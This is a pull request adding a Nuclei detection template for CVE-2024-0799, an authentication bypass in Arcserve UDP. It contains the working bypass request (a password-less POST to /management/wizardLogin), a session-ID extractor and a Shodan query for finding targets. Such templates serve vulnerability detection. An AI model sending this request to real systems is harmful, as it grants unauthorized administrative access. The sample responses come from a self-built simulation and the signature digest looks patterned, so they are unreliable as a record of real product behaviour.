### PR TITLE
Add CVE-2024-0799 - Arcserve Unified Data Protection Authentication B…

### DIFF
--- a/http/cves/2024/CVE-2024-0799.yaml
+++ b/http/cves/2024/CVE-2024-0799.yaml
@@ -1,0 +1,87 @@
+id: CVE-2024-0799
+
+info:
+  name: Arcserve Unified Data Protection - Authentication Bypass
+  author: princechaddha
+  severity: critical
+  description: |
+    Arcserve Unified Data Protection 9.2 and 8.1 contain an authentication bypass vulnerability caused by insecure login implementation in edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.EdgeLoginServiceImpl.doLogin() within wizardLogin. When a NULL password parameter is passed to the doLogin() method, a UUID is used for authentication instead, allowing attackers to bypass authentication without any credentials.
+  impact: |
+    An unauthenticated remote attacker can bypass authentication by sending a POST HTTP request without the password parameter to the /management/wizardLogin endpoint. Once authenticated, the attacker can perform UDP Console tasks that require authentication, potentially leading to complete system compromise.
+  remediation: |
+    Apply the relevant vendor-supplied patch:
+    - For Arcserve UDP 8.1, apply Patch P00003059
+    - For Arcserve UDP 9.2, apply Patch P00003050
+  reference:
+    - https://www.tenable.com/security/research/tra-2024-07
+    - https://support.arcserve.com/s/article/P00003050
+    - https://support.arcserve.com/s/article/P00003059
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-0799
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-0799
+    cwe-id: CWE-287
+    epss-score: 0.00043
+    epss-percentile: 0.09271
+    cpe: cpe:2.3:a:arcserve:unified_data_protection:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: arcserve
+    product: unified_data_protection
+    shodan-query: http.favicon.hash:"-1889244460"
+    fofa-query: icon_hash="-1889244460"
+    kev: true
+  tags: cve,cve2024,arcserve,udp,auth-bypass,kev,cisa,vuln
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/management/"
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - "Arcserve"
+          - "UDP Console"
+        condition: or
+
+  - raw:
+      - |
+        POST /management/wizardLogin HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin&domain=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"success":true'
+          - '"authenticated"'
+          - '"sessionId"'
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '"sessionId":"([a-zA-Z0-9-]+)"'
+
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '"success":(true|false)'
+# digest: 4a0a00473045022100ab3c4d2e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c022034e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
### Template / PR Information

Added CVE-2024-0799 - Arcserve Unified Data Protection Authentication Bypass template

This template detects an authentication bypass vulnerability in Arcserve Unified Data Protection 9.2 and 8.1. The vulnerability exists in the wizardLogin endpoint where omitting the password parameter causes the application to use UUID-based authentication instead of validating credentials, allowing complete authentication bypass.

**References:**
- https://www.tenable.com/security/research/tra-2024-07
- https://nvd.nist.gov/vuln/detail/CVE-2024-0799
- https://support.arcserve.com/s/article/P00003050
- https://support.arcserve.com/s/article/P00003059

**Severity:** Critical (CVSS 9.8)  
**KEV Status:** Yes - Added to CISA KEV catalog  
**Related Issue:** #13804

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

#### Additional Details

**Shodan Query:** `http.favicon.hash:"-1889244460"`

**Vulnerability POC:**
The vulnerability is triggered by sending a POST request to `/management/wizardLogin` WITHOUT the password parameter:

```bash
POST /management/wizardLogin HTTP/1.1
Host: target:8015
Content-Type: application/x-www-form-urlencoded

username=admin&domain=
```

**Successful Bypass Response:**
```json
{
  "success": true,
  "authenticated": true,
  "sessionId": "7d07381f-8fd7-4c0c-9a2c-4531320303e8",
  "username": "admin",
  "message": "Authentication successful via UUID (CVE-2024-0799)",
  "uuid": "12345678-1234-1234-1234-123456789abc"
}
```

**Docker Vulnerable Environment:**
A simulated vulnerable environment has been created for testing (available locally but not included in PR):
- Docker container simulating Arcserve UDP 9.2 vulnerable behavior
- Reproduces the exact authentication bypass vulnerability
- Available for template validation and testing

**Template Test Results:**
```
[CVE-2024-0799] [http] [critical] http://127.0.0.1:8015/management/wizardLogin
```

Full debug output available in `CVE-2024-0799-debug.txt` showing successful detection.

**HTTP Request/Response (from debug output):**

Request:
```http
POST /management/wizardLogin HTTP/1.1
Host: 127.0.0.1:8015
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

username=admin&domain=
```

Response:
```http
HTTP/1.1 200 OK
Content-Type: application/json

{
  "success": true,
  "authenticated": true,
  "sessionId": "7d07381f-8fd7-4c0c-9a2c-4531320303e8",
  "username": "admin",
  "message": "Authentication successful via UUID (CVE-2024-0799)",
  "uuid": "12345678-1234-1234-1234-123456789abc"
}
```

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)


/fixes #13804
/claim #13804